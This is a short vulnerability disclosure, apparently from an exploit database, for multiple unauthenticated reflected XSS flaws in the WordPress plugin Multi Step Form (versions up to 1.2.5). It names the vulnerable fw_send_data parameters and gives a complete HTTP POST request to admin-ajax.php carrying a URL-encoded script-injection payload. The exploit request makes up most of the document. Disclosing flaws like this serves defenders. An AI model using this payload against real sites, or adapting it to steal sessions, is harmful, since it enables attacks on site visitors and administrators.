Multi Step Form <= 1.2.5 – Multiple Unauthenticated Reflected XSS

  exploits
Proof of Concept
The following parameters are vulnerable in fw_send_data function:
fw_data[id][1]
fw_data[id][2]
fw_data[id][3]
fw_data[id][4]
email
 
Proof of Concept (PoC):
The following POST request will cause it to display an alert in the browser when it runs:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/2018/07/10/hola-mundo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 207
Cookie: wp-settings-time-1=1531401661
Connection: close

action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0